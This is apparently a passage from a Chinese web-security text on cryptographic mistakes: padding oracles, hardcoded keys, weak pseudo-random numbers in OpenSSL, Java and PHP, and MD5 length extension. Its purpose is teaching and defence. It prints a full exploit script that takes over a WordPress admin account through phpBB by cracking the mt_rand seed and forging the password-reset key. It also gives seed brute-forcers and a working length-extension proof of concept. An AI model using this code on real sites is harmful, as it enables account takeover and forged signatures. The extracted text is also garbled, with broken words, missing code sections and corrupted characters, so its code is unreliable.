complete blackbox environment key = ENCKEY if cipher.lower() == "des": o = DES.new(key, DES.MODE_CBC,iv) elif cipher.lower() == "aes": o = AES.new(key, AES.MODE_CBC,iv) elif cipher.lower() == "des3": o = DES3.new(key, DES3.MODE_CBC,iv) elif cipher.lower() == "blowfish": o = Blowfish.new(key, Blowfish.MODE_CBC,iv) elif cipher.lower() == "cast": o = CAST.new(key, CAST.MODE_CBC,iv) elif cipher.lower() == "arc2": o = ARC2.new(key, ARC2.MODE_CBC,iv) else: return False if len(iv) % 8 != 0: return False if len(ciphertext) % 8 != 0: return False return o.decrypt(ciphertext) def encrypt(plaintext, iv, cipher): key = ENCKEY if cipher.lower() == "des": if len(key) != 8: print "[-] DES key must be 8 bytes long!" return False o = DES.new(key, DES.MODE_CBC,iv) elif cipher.lower() == "aes": if len(key) != 16 and len(key) != 24 and len(key) != 32: print "[-] AES key must be 16/24/32 bytes long!" return False o = AES.new(key, AES.MODE_CBC,iv) elif cipher.lower() == "des3": if len(key) != 16: print "[-] Triple DES key must be 16 bytes long!" return False o = DES3.new(key, DES3.MODE_CBC,iv) elif cipher.lower() == "blowfish": o = Blowfish.new(key, Blowfish.MODE_CBC,iv) elif cipher.lower() == "cast": o = CAST.new(key, CAST.MODE_CBC,iv) elif cipher.lower() == "arc2": o = ARC2.new(key, ARC2.MODE_CBC,iv) else: return False plaintext = add_PKCS5_padding(plaintext, len(iv)) return o.encrypt(plaintext) def xor_str(a,b): if len(a) != len(b): return False c = '' for i in range(0, len(a)): c += chr( ord(a[i]) ^ ord(b[i]) ) return c def hex_s(str): re = '' for i in range(0,len(str)): re += "\\x"+binascii.b2a_hex(str[i]) return re if __name__ == "__main__": main(sys.argv)

Padding Oracle Attack的关键在于攻击者能够获知解密的结果是否符合padding。在实现和使用CBC模式的分组加密算法时,注意这一点即可。





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public boolean VerifyAdmin(String password) { if (password.equals("68af404b513073584c4b6f22 b6c63e6b")) { System.out.println("Entering Diagnostic Mode..."); return true; } System.out.println("Incorrect Password!"); return false;


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File saveFile = new File("Settings.set"); saveFile.delete(); FileOutputStream fout = new FileOutputStream(saveFile); //Encrypt the settings //Generate a key byte key[] = "My Encryption Key98".getBytes(); DESKeySpec desKeySpec = new DESKeySpec(key); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES"); SecretKey skey = keyFactory.generateSecret(desKeySpec); //Prepare the encrypter Cipher ecipher = Cipher.getInstance("DES"); ecipher.init(Cipher.ENCRYPT_MODE, skey); // Seal (encrypt) the object SealedObject so = new SealedObject(this, ecipher); ObjectOutputStream o = new ObjectOutputStream(fout); o.writeObject(so); o.close();


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function toSubmit($payment){ $merId = $this- >getConf($payment['M_OrderId'], 'member_id'); //账号 $pKey = $this- >getConf($payment['M_OrderId'], 'PrivateKey'); $key = $pKey==''?'afsvq2mqwc7j0i69uzvukqexrzd0jq6 h':$pKey;//私钥值 $ret_url = $this->callbackUrl; $server_url = $this->serverCallbackUrl;








密钥管理的主要目的,还是为了防止密钥从非正常的渠道泄露。定期更换密钥也是一种有效的做法。一个比较安全的密钥管理系统,可以将所有的密钥(包括一些敏感配置文件)都集中保存在一个服务器(集群)上,并通过Web Service的方式提供获取密钥的API。每个Web应用在需要使用密钥时,通过带认证信息的API请求密钥管理系统,动态获取密钥。Web应用不能把密钥写入本地文件中,只加载到内存,这样动态获取密钥最大程度地保护了密钥的私密性。密钥集中管理,降低了系统对于密钥的耦合性,也有利于定期更换密钥。


伪随机数(pseudo random number)问题——伪随机数不够随机,是程序开发中会出现的一个问题。一方面,大多数开发者对此方面的安全知识有所欠缺,很容易写出不安全的代码;另一方面,伪随机数问题的攻击方式在多数情况下都只存在于理论中,难以证明,因此在说服程序员修补代码时也显得有点理由不够充分。



2008年5月13日,Luciano Bello发现了De-bian上的OpenSSL包中存在弱伪随机数算法。


1 2 3 45
MD_Update(&m,buf,j); [ .. ] MD_Update(&m,buf,j); /* purify complains */

这直接导致的后果是,在OpenSSL的伪随机数生成算法中,唯一的随机因子是pid。而在Linux系统中,pid的最大值也是32768。这是一个很小的范围,因此可以很快地遍历出所有的随机数。受到影响的有,从2006.9到2008.5.13的debian平台上生成的所有ssh key的个数是有限的,都是可以遍历出来的,这是一个非常严重的漏洞。同时受到影响的还有OpenSSL生成的key以及OpenVPN生成的key。


再看看下面这个例子。在Sun Java 6 Update11之前的createTempFile()中存在一个随机数可预测的问题,在短时间内生成的随机数实际上是顺序增长的。Chris Eng发现了这个问题。

1 2 3
java.io.File.createTempFile(deploymentName, extension);


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private static File generateFile(String s, String s1, File file) throws IOException { if(counter == -1) counter = (new Random()).nextInt() & 0xffff; counter++; return new File(file, (new StringBuilder()).append(s).append(Integer.toS tring(counter)).append(s1).toString()); } public static File createTempFile(String s, String s1, File file) throws IOException { ... File file1; do file1 = generateFile(s, s2, file); while(!checkAndCreate(file1.getPath(), securitymanager)); return file1; }








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import java.io.*; public class getTemp { /** * @param args */ public static void main(String[] args) { // TODO Auto-generated method stub File f = null; String extension = ".tmp"; try { //for (int i=0; i<10; i++){ f = File.createTempFile("temp", extension); System.out.println(f.getPath()); //} } catch (IOException e) { } } }



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private static File generateFile(String s, String s1, File file) throws IOException { long l = LazyInitialization.random.nextLong(); if(l == 0x8000000000000000L) l = 0L; else l = Math.abs(l); return new File(file, (new StringBuilder()).append(s).append(Long.toStri ng(l)).append(s1).toString()); }





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function sendPSW(){ …… $messenger = &$this->system- >loadModel('system/messenger');echo microtime()."<br/>"; $passwd = substr(md5(print_r(microtime(),true)),0,6) ; ……








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<?php //on windows print getrandmax();// 32767 print mt_getrandmax(); //2147483647 ?>


其实PHP中的mt_rand()也不是很安全,Ste-fan Esser在他著名的paper:“mt_srand and notso random numbers”中提出了PHP的伪随机函数mt_rand()在实现上的一些缺陷。


在PHP 4.2.0之前的版本中,是需要通过srand()或mt_srand()给rand()、mt_rand()播种的:在PHP 4.2.0之后的版本中不再需要事先通过srand()、mt_srand()播种。比如直接调用mt_rand(),系统会自动播种。但为了和以前版本兼容,PHP应用代码里经常会这样写:

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mt_srand(time()); mt_srand((double) microtime() * 100000); mt_srand((double) microtime() * 1000000); mt_srand((double) microtime() * 10000000);


1 2 3
0<(double) microtime()<1 ---> 0<(double) microtime()* 1000000<1000000


在PHP 4.2.0之后的版本中,如果没有通过播种函数指定seed,而直接调用mt_rand(),则系统会分配一个默认的种子。在32位系统上默认的播种的种子最大值是2^32,因此最多只需要尝试2^32次就可以破解seed。

在Stefan Esser的文中还提到,如果是在同一个进程中,则同一个seed每次通过mt_rand()生成的值都是固定的。比如如下代码:

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<?php mt_srand (1); echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; ?>









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<?php mt_srand ((double) microtime() * 1000000); echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; echo mt_rand().'<br/>'; ?>



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<?php if ($seed = get_seed()){ echo "seed is :".$seed."\n"; mt_srand($seed); echo mt_rand()."\n"; echo mt_rand()."\n"; echo mt_rand()."\n"; echo mt_rand()."\n"; echo mt_rand()."\n"; echo mt_rand()."\n"; echo mt_rand()."\n"; } function get_seed(){ for ($i=0;$i<1000000 ;$i++){ mt_srand($i); //mt_rand(); // 对应是第几次调用mt_rand() $str = mt_rand(); // 在本例中是第一次调用 mt_rand() if ($str == 466805928 ) // 对比随机数的值 return $i; } return False; } ?>


需要注意的是,在PHP 5.2.1及其之后的版本中调整了随机数的生成算法,但强度未变,因此在实施猜解种子时,需要在对应的PHP版本中运行猜解程序。

在Stefan Esser的文中还提到了一个小技巧,可以通过发送Keep-Alive HTTP头,迫使服务器端使用同一PHP进程响应请求,而在该PHP进程中,随机数在使用时只会在一开始播种一次。

在一个Web应用中,有很多地方都可以获取到随机数,从而提供猜解种子的可能。Stefan Esser提供了一种“Cross Application Attacks”的思路,即通过前一个应用在页面上返回的随机数值,猜解出其他应用生成的随机数值。

1 2 3
mt_srand ((double) microtime() * 1000000); $search_id = mt_rand();


这种攻击确实可行,比如一个服务器上同时安装了WordPress与phpBB,可以通过phpBB猜解出种子,然后利用WordPress的密码取回功能猜解出新生成的密码。Stefan Esser描述这个攻击过程如下:

(1)使用Keep-Alive HTTP请求在phpBB2论坛中搜索字符串‘a’;



(4)攻击者仍然使用Keep-Alive HTTP头发送一个重置admin密码的请求给WordPressblog;

(5)WordPress mt_rand()生成确认链接,并发送到管理员邮箱;






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<?php echo "-------------------------------------------- ----------------------\n"; echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n"; echo "(c)oded by Raz0r (http://Raz0r.name/)\n"; echo "-------------------------------------------- ----------------------\n"; if ($_SERVER['argc']<3) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n"; echo "[wp] - target server where Wordpress is installed\n"; echo "[phpbb] - path to phpBB (must be located on the same server)\n\n"; echo "OPTIONS:\n"; echo "--wp_user=[value] (default: admin)\n"; echo "--search=[value] (default: `site OR file`)\n"; echo "--skipcheck (force exploit not to compare PHP versions)\n"; echo "examples:\n"; echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/ \n"; echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/ forum/ --wp_user=lol\n"; die; } set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $wp = $_SERVER['argv'][1]; $phpbb = $_SERVER['argv'][2]; for($i=3;$i<$_SERVER['argc'];$i++){ if(strpos($_SERVER['argv'][$i],"-- wp_user=")!==false) { list(,$wp_user) = explode("=", $_SERVER['argv'][$i]); } if (strpos($_SERVER['argv'][$i],"-- search=")!==false) { list(,$search) = explode("=", $_SERVER['argv'][$i]); } if (strpos($_SERVER['argv'][$i],"-- skipcheck")!==false) { $skipcheck=true; } } if(!isset($wp_user))$wp_user='admin'; if(!isset($search))$search='site OR file'; $wp_parts = @parse_url($wp); $phpbb_parts = @parse_url($phpbb); if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n"); if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n"); if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n"); $phpbb_host = $phpbb_parts['host']; if(isset($phpbb_parts['port']))$phpbb_port= $phpbb_parts['port']; else $phpbb_port=80; if(isset($phpbb_parts['path']))$phpbb_path= $phpbb_parts['path']; else $phpbb_path="/"; if(substr($phpbb_path,-1,1)! ="/")$phpbb_path .= "/"; $wp_host = $wp_parts['host']; if(isset($wp_parts['port']))$wp_port= $wp_parts['port']; else $wp_port=80; if(isset($wp_parts['path']))$wp_path= $wp_parts['path']; else $wp_path="/"; if(substr($wp_path,-1,1)!="/")$wp_path .= "/"; echo "[~] Connecting... "; $sock = fsockopen($phpbb_ip,$phpbb_port); if(!$sock)die("failed\n"); else echo "OK\n"; $packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n"; $packet.= "Host: {$wp_host}\r\n"; $packet.= "Connection: close\r\n\r\n"; $resp=''; fputs($sock,$packet); while(!feof($sock)) { $resp.=fgets($sock); } fclose($sock); if(preg_match('@HTTP/1\.(0|1) 200 OK@i', $resp)){ if(preg_match('@login\.css\?ver=([\d \.]+)\'@',$resp)) $wp26=true; else $wp26=false; } else die("[-] Can't obtain wp-login.php \n"); if(!isset($skipcheck)) { echo "[~] Comparing PHP versions... "; $out=array(); preg_match('@x-powered-by: *PHP/([\d \.]+)@i',$resp,$out); if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n"); else { if(! (version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(! version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) { $packet.= "Content-Type: application/x-www- form-urlencoded\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n\r\n"; $packet.= $data; fputs($ock, $packet); sleep(5); $resp=''; while(!feof($ock)) { $resp = fgets($ock); preg_match('@search.php\?search_id=(\d +)&amp;@',$resp,$search); if(isset($search[1])) { $search_id = (int)$search[1]; echo "[+] search_id is $search_id\n"; break; } } if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n"); echo "[~] Sending request to $wp\n"; $data = "user_login=".urlencode($wp_user)."&wp- submit=Get+New+Password"; $packet = "POST {$wp_path}wp-login.php? action=lostpassword HTTP/1.1\r\n"; $packet.= "Host: {$wp_host}\r\n"; $packet.= "Connection: keep-alive\r\n"; $packet.= "Keep-alive: 300\r\n"; $packet.= "Referer: {$wp}/wp-login.php? action=lostpassword\r\n"; $packet.= "Content-Type: application/x-www- form-urlencoded\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n\r\n"; $packet.= $data; fputs($ock,$packet); $seed = search_seed($search_id); if($seed!==false) echo "[+] Seed is $seed\n"; else die("[-] Seed Not Found\n"); mt_srand($seed); mt_rand(); if($wp26) $key = wp26_generate_password(20, false); else $key = wp_generate_password(); echo "[+] Activation key should be $key\ "; echo "[~] Sending request to activate password reset\n"; $packet = "GET {$wp_path}wp-login.php? action=rp&key={$key} HTTP/1.1\r\n"; $packet.= "Host: {$wp_host}\r\n"; $packet.= "Connection: close\r\n\r\n"; fputs($ock,$packet); while(!feof($ock)) { $resp .= fgets($ock); } if(preg_match('/(Invalid username or e-mail)| (镱朦珙忄蝈朦 铗耋蝰蜮箦 徉珏 溧眄 )|(湾镳 噔桦铄 桁 镱朦珙忄蝈 )/i',$resp)) die("[-] Incorrect username for wordpress \n"); if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n"); if($wp26) $pass = wp26_generate_password(); else $pass = wp_generate_password(); echo "[+] New password should be $pass\n"; function search_seed($rand_num) { $max = 1000000; for($seed=0;$seed<=$max;$seed++){ mt_srand($seed); $key = mt_rand(); if($key==$rand_num) return $seed; } return false; } function wp26_generate_password($length = 12, $special_chars = true) { $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR STUVWXYZ0123456789'; if ( $special_chars ) $chars .= '!@#$%^&*()'; $password = ''; for ( $i = 0; $i < $length; $i++ ) $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1); return $password; } function wp_generate_password() { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR STUVWXYZ0123456789"; $length = 7; $password = ''; for ( $i = 0; $i < $length; $i++ ) $password .= substr($chars, mt_rand(0, 61), 1); return $password; } ?>




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try { // Create a secure random number generator SecureRandom sr = SecureRandom.getInstance("SHA1PRNG"); // Get 1024 random bits byte[] bytes = new byte[1024/8]; sr.nextBytes(bytes); // Create two secure number generators with the same seed int seedByteCount = 10; byte[] seed = sr.generateSeed(seedByteCount); sr = SecureRandom.getInstance("SHA1PRNG"); sr.setSeed(seed); SecureRandom sr2 = SecureRandom.getInstance("SHA1PRNG"); sr2.setSeed(seed); } catch (NoSuchAlgorithmException e) { }


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int randomData = open("/dev/random", O_RDONLY); int myRandomInteger; read(randomData, &myRandomInteger, sizeof myRandomInteger); // you now have a random integer! close(randomData);

而在PHP 5.3.0及其之后的版本中,若是支持openSSL扩展,也可以直接使用函数来生成随机数:

1 2 3
string openssl_random_pseudo_bytes ( int $length [, bool &$crypto_strong ] )
















(附)Understanding MD5

Length Extension Attack背景

2009年,Thai Duong与Juliano Rizzo不仅仅发布了ASP.NET的Padding Oracle攻击,同时还写了一篇关于Flickr API签名可伪造的pa-per,和Padding Oracle的paper放在一起。因为Flickr API签名这个漏洞,也是需要用到padding的。

两年过去了,在安全圈子(国内国外)里大家的眼光似乎都只放到了Padding Oracle上,而有意无意地忽略了Flickr API签名这个问题。我前段时间看paper时,发现Flickr API签名这个漏洞,实际上用的是MD5 Length Extension Attack,和Padding Oracle还是很不一样的。在研究了ThaiDuong 的paper后,我发现作者根本就未曾公布MD5 Length Extension Attack的具体实现方法,只是看到作者像变魔术一样突然丢出来POC。

Thai Duong的paper中的描述


我百思不得其解,试图还原这个攻击的过程,为此查阅了大量的资料,结果发现整个互联网上除了一些理论外,根本就没有这个攻击的任何实现。于是经过一段时间的研究后,我决定写下这篇blog,来填补这一空白。以后哪位哥们的工作要是从本文中得到了启发,记得引用下本文。什么是Length Extension Attack?

很多哈希算法都存在Length Extension攻击,这是因为这些哈希算法都使用了Merkle-Damg?rd hash construction进行数据压缩,流行算法比如MD5、SHA-1等都受到影响。



而Length Extension是这样的:



MD5 length-extension攻击原理图

所以要实施Length Extension Attack,就需要找到MD5(secret)最后压缩的值,并算出其padding,然后加入到下一轮的MD5压缩算法中,算出最终我们需要的值。理解Length Extension Attack

为了深入理解Length Extension Attack,我们需要深入到MD5的实现中。而最终的exploit,也需要通过patch MD5来实现。MD5的实现算法可以参考RFC1321。这个成熟的算法现在已经有了各个语言版本的实现,本身也较为简单。我从网上找了一个JavaScript版本,并以此为基础实现Length Extension Attack。




最后8个字节用以表示数据长度,为19*8 =152。






还记得前面那张MD5结构的图吗?这个for循环的过程,就是一次次的压缩过程。上一次压缩的结果,将作为下一次压缩的输入。而Length Ex-tension的理论基础,就是将已知的压缩后的结果,直接拿过来作为新的压缩输入。在这个过程中,只需要上一次压缩后的结果,而不需要知道原来的消息内容是什么。实施Length Extension Attack

理解了Length Extension的原理后,接下来就需要实施这个攻击了。这里有几点需要注意,首先是MD5值怎么还原为压缩函数中所需要的4个整数?





9d391442 efea4be3 666caf85 49bd4fd3




从它的MD5值中可以直接还原出这4个中间值,同时我们希望附加消息“axis is smart!”,并计算新消息的MD5值。





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<script src="md5.js" ></script> <script src="md5_le.js" ></script> <script> function print(str){ document.write(str); } print("=== MD5 Length Extension Attack POC ===<br>=== by axis ===<br><br>"); // turn this to be true if want to see internal state debug = false; var x = String(Math.random()); var append_m = 'axis is smart!'; print("[+] secret is :"+x+"<br>"+"[+] length is :" + x.length+"<br>"); print("[+] message want to append is :"+append_m+"<br>"); print("[+] Start calculating secret's hash<br>"); var old = faultylabs.MD5(x); print("<br>[+] Calculate secret's md5 hash: <b>"+old+"</b><br>"); print("<br><br>============================== ==<br>"); print("[+] Start calculating new hash<br>"); print("[+] theory: h(m||p||m1)<br>"); print("[+] that is: md5_compression_function('"+old+"', 'secret's length', '"+ append_m +"')"+"<br>"); var hash_guess = md5_length_extension(old, x.length, append_m); print("[+] padding(urlencode format) is: "+ escape(hash_guess['padding']) + "<br/>"); print("<br>[+] guessing new hash is: <b>"+hash_guess['hash']+"</b><br>"); print("<br><br>============================== ==<br>"); print("[+] now verifying the new hash<br>"); var x1 = ''; x1 = x + hash_guess['padding'] + append_m; print("[+] new message(urlencode format) is: <br>"+ escape(x1) +"<br><br>"); var v = faultylabs.MD5(x1); print("<br>[+] md5 of the new message is: <b>"+v+"</b><br/>"); </script>

关键代码md5_le.js是patch MD5算法的实现,基于faultylabs的MD5实现而来,其源代码附后。md5.js则是faultylabs的MD5实现,在此仅用于验证MD5值。

如何利用Length Extension Attack

如何利用Length Extension Attack呢?我们知道Length Extension使得可以在原文之后附加任意值,并计算出新的哈希。最常见的地方就是签名。

一个合理的签名,一般需要salt或者key加上参数值,而salt或者key都是未知的,也就使得原文是未知的。在Flickr API签名的问题中,FlickrAPI同时还犯了一个错误,这个错误Amazon的AWS签名也犯过——就是在签名校验算法中,参数连接时没有使用间隔符。所以本来如:








通过Length Extension可以生成一个新的合法的签名。这是第一种利用方法。





附带相同的参数可能在不同的环境下造成不同的结果,从而产生一些逻辑漏洞。在普通情况下,可以直接注入新参数,但如果服务器端校验了签名,则需要通过Length Extension伪造一个新的签名才行。


最后,Length Extension需要知道的length,其实是可以考虑暴力破解的。

Length Extension还有什么利用方式?尽情发挥你的想象力吧。How to Fix?

MD5、SHA-1之类的使用Merkle-Damg?rdhash construction的算法是没希望了。


另外,针对Flickr API等将参数签名的应用来说,secret放置在参数末尾也能防止这种攻击。

比如MD5(m+secret),希望推导出MD5(m+secret||padding||m'),结果由于自动附加se-cret在末尾的关系,会变成MD5(m||padding||m'||secret),从而导致Length Extension run不起来。


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http://rdist.root.org/2009/10/29/stop-us-ing-unsafe-keyed-hashes-use-hmac/ http://en.wikipedia.org/wiki/SHA-1 http://utcc.utoronto.ca/~cks/space/blog/programming/HashLengthExtAttack http://netifera.com/research/flickr_api_sig-nature_forgery.pdf http://en.wikipedia.org/wiki/Merkle-Damg?rd_construction http://www.ietf.org/rfc/rfc1321.txt


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md5_length_extension = function(m_md5, m_len, append_m){ var result = new Array(); if (m_md5.length != 32){ alert("input error!"); return false; } // 将MD5值拆分成4组,每组8个字节 var m = new Array(); for (i=0;i<m_md5.length;i+=8){ m.push(m_md5.slice(i,i+8)); } // 将MD5的4组值还原成压缩函数所需要的数值 var x; for(x in m){ m[x] = ltripzero(m[x]); // convert string to int ; convert of to_zerofilled_hex() m[x] = parseInt(m[x], 16) >> 0; // convert of int128le_to_hex var t=0; var ta=0; ta = m[x]; t = (ta & 0xFF); ta = ta >>> 8; t = t << 8; t = t | (ta & 0xFF); ta = ta >>> 8; t = t << 8; t = t | (ta & 0xFF); ta = ta >>> 8; t = t << 8; t = t | ta; m[x] = t; } // 此时只需要使用MD5压缩函数执行 append_m 以及 append_m的padding即可 // 此时m 的压缩值已经不再需要,可以用填充字节代替 var databytes = new Array(); // 初始化,只需要知道 m % 64 的长度即可,事实上可以随意填充,但我们其实还想知道padding // 如果消息长度大于64,则需要构造之前的等长度的消息,用以后面计算正确的消息长度 if (m_len>64){ for (i=0;i<parseInt(m_len/64)*64;i++){ databytes.push('97'); // 填充任意字节 } } for (i=0;i<(m_len%64);i++){ databytes.push('97'); // 填充任意字节 } // 调用padding databytes = padding(databytes); // 保存结果为padding,我们也需要这个结果 result['padding'] = ''; for (i=(parseInt(m_len/64)*64 + m_len %64);i<databytes.length;i++){ result['padding'] += String.fromCharCode(databytes[i]); } // 将append_m 转换为数组添加 for (j=0;j<append_m.length;j++){ databytes.push(append_m.charCodeAt(j)); } // 计算新的padding databytes = padding(databytes); var h0 = m[0]; var h1 = m[1]; var h2 = m[2]; var h3 = m[3]; var a=0,b=0,c=0,d=0; // Digest message // i=n 开始,因为从 append_b 开始压缩 for (i = parseInt(m_len/64)+1; i < databytes.length / 64; i++) { // initialize run a = h0 b = h1 c = h2 d = h3 var ptr = i * 64 // do 64 runs updateRun(fF(b, c, d), 0xd76aa478, bytes_to_int32(databytes, ptr), 7) updateRun(fF(b, c, d), 0xe8c7b756, bytes_to_int32(databytes, ptr + 4), 12) updateRun(fF(b, c, d), 0x242070db, bytes_to_int32(databytes, ptr + 8), 17) updateRun(fF(b, c, d), 0xc1bdceee, bytes_to_int32(databytes, ptr + 12), 22) updateRun(fF(b, c, d), 0xf57c0faf, bytes_to_int32(databytes, ptr + 16), 7) updateRun(fF(b, c, d), 0x4787c62a, bytes_to_int32(databytes, ptr + 20), 12) updateRun(fF(b, c, d), 0xa8304613, bytes_to_int32(databytes, ptr + 24), 17) updateRun(fF(b, c, d), 0xfd469501, bytes_to_int32(databytes, ptr + 28), 22) updateRun(fF(b, c, d), 0x698098d8, bytes_to_int32(databytes, ptr + 32), 7) updateRun(fF(b, c, d), 0x8b44f7af, bytes_to_int32(databytes, ptr + 36), 12) updateRun(fF(b, c, d), 0xffff5bb1, bytes_to_int32(databytes, ptr + 40), 17) updateRun(fF(b, c, d), 0x895cd7be, bytes_to_int32(databytes, ptr + 44), 22) updateRun(fF(b, c, d), 0x6b901122, bytes_to_int32(databytes, ptr + 48), 7) updateRun(fF(b, c, d), 0xfd987193, bytes_to_int32(databytes, ptr + 52), 12) updateRun(fF(b, c, d), 0xa679438e, bytes_to_int32(databytes, ptr + 56), 17) updateRun(fF(b, c, d), 0x49b40821, bytes_to_int32(databytes, ptr + 60), 22) updateRun(fG(b, c, d), 0xf61e2562, bytes_to_int32(databytes, ptr + 4), 5) updateRun(fG(b, c, d), 0xc040b340, bytes_to_int32(databytes, ptr + 24), 9) updateRun(fG(b, c, d), 0x265e5a51, bytes_to_int32(databytes, ptr + 44), 14) updateRun(fG(b, c, d), 0xe9b6c7aa, bytes_to_int32(databytes, ptr), 20) updateRun(fG(b, c, d), 0xd62f105d, bytes_to_int32(databytes, ptr + 20), 5) updateRun(fG(b, c, d), 0x2441453, bytes_to_int32(databytes, ptr + 40), 9) updateRun(fG(b, c, d), 0xd8a1e681, bytes_to_int32(databytes, ptr + 60), 14) updateRun(fG(b, c, d), 0xe7d3fbc8, bytes_to_int32(databytes, ptr + 16), 20) updateRun(fG(b, c, d), 0x21e1cde6, bytes_to_int32(databytes, ptr + 36), 5) bytes_to_int32(databytes, ptr + 56), 23) updateRun(fH(b, c, d), 0xa4beea44, bytes_to_int32(databytes, ptr + 4), 4) updateRun(fH(b, c, d), 0x4bdecfa9, bytes_to_int32(databytes, ptr + 16), 11) updateRun(fH(b, c, d), 0xf6bb4b60, bytes_to_int32(databytes, ptr + 28), 16) updateRun(fH(b, c, d), 0xbebfbc70, bytes_to_int32(databytes, ptr + 40), 23) updateRun(fH(b, c, d), 0x289b7ec6, bytes_to_int32(databytes, ptr + 52), 4) updateRun(fH(b, c, d), 0xeaa127fa, bytes_to_int32(databytes, ptr), 11) updateRun(fH(b, c, d), 0xd4ef3085, bytes_to_int32(databytes, ptr + 12), 16) updateRun(fH(b, c, d), 0x4881d05, bytes_to_int32(databytes, ptr + 24), 23) updateRun(fH(b, c, d), 0xd9d4d039, bytes_to_int32(databytes, ptr + 36), 4) updateRun(fH(b, c, d), 0xe6db99e5, bytes_to_int32(databytes, ptr + 48), 11) updateRun(fH(b, c, d), 0x1fa27cf8, bytes_to_int32(databytes, ptr + 60), 16) updateRun(fH(b, c, d), 0xc4ac5665, bytes_to_int32(databytes, ptr + 8), 23) updateRun(fI(b, c, d), 0xf4292244, bytes_to_int32(databytes, ptr), 6) updateRun(fI(b, c, d), 0x432aff97, bytes_to_int32(databytes, ptr + 28), 10) updateRun(fI(b, c, d), 0xab9423a7, bytes_to_int32(databytes, ptr + 56), 15) updateRun(fI(b, c, d), 0xfc93a039, bytes_to_int32(databytes, ptr + 20), 21) updateRun(fI(b, c, d), 0x655b59c3, bytes_to_int32(databytes, ptr + 48), 6) updateRun(fI(b, c, d), 0x8f0ccc92, bytes_to_int32(databytes, ptr + 12), 10) updateRun(fI(b, c, d), 0xffeff47d, bytes_to_int32(databytes, ptr + 40), 15) updateRun(fI(b, c, d), 0x85845dd1, bytes_to_int32(databytes, ptr + 4), 21) updateRun(fI(b, c, d), 0x6fa87e4f, bytes_to_int32(databytes, ptr + 32), 6) updateRun(fI(b, c, d), 0xfe2ce6e0, bytes_to_int32(databytes, ptr + 60), 10) updateRun(fI(b, c, d), 0xa3014314, bytes_to_int32(databytes, ptr + 24), 15) updateRun(fI(b, c, d), 0x4e0811a1, bytes_to_int32(databytes, ptr + 52), 21) updateRun(fI(b, c, d), 0xf7537e82, bytes_to_int32(databytes, ptr + 16), 6) updateRun(fI(b, c, d), 0xbd3af235, bytes_to_int32(databytes, ptr + 44), 10) updateRun(fI(b, c, d), 0x2ad7d2bb, bytes_to_int32(databytes, ptr + 8), 15) updateRun(fI(b, c, d), 0xeb86d391, bytes_to_int32(databytes, ptr + 36), 21) // update buffers h0 = _add(h0, a) h1 = _add(h1, b) h2 = _add(h2, c) h3 = _add(h3, d) if (debug == true){ document.write("run times: "+i+"<br/ >h3: "+h3+"<br/>h2: "+h2+"<br/>h1: "+h1+"<br/>h0: "+h0+"<br/>") } } result['hash'] = int128le_to_hex(h3, h2, h1, h0); return result; // 检测分组后开头是否有0,如果有则去掉 function ltripzero(str){ if (str.length != 8) { return false; } if (str == "00000000"){ return str; } var result = ''; if (str.indexOf('0') == 0 ) { var tmp = new Array(); tmp = str.split(''); for (i=0;i<8;i++){ if (tmp[i] != 0){ for(j=i;j<8;j++){ result = result + tmp[j]; } break; } } return result; }else{ return str; } } // 往数组填充padding function padding(databytes){ if (databytes.constructor != Array) { return false; } // save original length var org_len = databytes.length // first append the "1" + 7x "0" databytes.push(0x80) //alert(databytes) // 添加第一个0x80,然后填充0x00到56位 // determine required amount of padding var tail = databytes.length % 64 // no room for msg length? if (tail > 56) { // pad to next 512 bit block for (var i = 0; i < (64 - tail); i++) { databytes.push(0x0) } tail = databytes.length % 64 } for (i = 0; i < (56 - tail); i++) { databytes.push(0x0) } // message length in bits mod 512 should now be 448 // append 64 bit, little-endian original msg length (in *bits*!) databytes = databytes.concat(int64_to_bytes(org_len * 8)) return databytes; } // MD5 压缩需要使用的函数 // function update partial state for each run function updateRun(nf, sin32, dw32, b32) { var temp = d d = c c = b //b = b + rol(a + (nf + (sin32 + dw32)), b32) b = _add(b, rol( _add(a, _add(nf, _add(sin32, dw32)) ), b32 ) ) a = temp } function _add(n1, n2) { return 0x0FFFFFFFF & (n1 + n2) } // convert the 4 32-bit buffers to a 128 bit hex string. (Little-endian is assumed) function int128le_to_hex(a, b, c, d) { var ra = "" var t = 0 var ta = 0 for (var i = 3; i >= 0; i--) { ta = arguments[i] t = (ta & 0xFF) ta = ta >>> 8 t = t << 8 t = t | (ta & 0xFF) ta = ta >>> 8 t = t << 8 t = t | (ta & 0xFF) ta = ta >>> 8 t = t << 8 t = t | ta ra = ra + to_zerofilled_hex(t) } return ra } // convert a 64 bit unsigned number to array of bytes. Little endian function int64_to_bytes(num) { var retval = [] for (var i = 0; i < 8; i++) { retval.push(num & 0xFF) num = num >>> 8 } return retval } // 32 bit left-rotation function rol(num, places) { return ((num << places) & 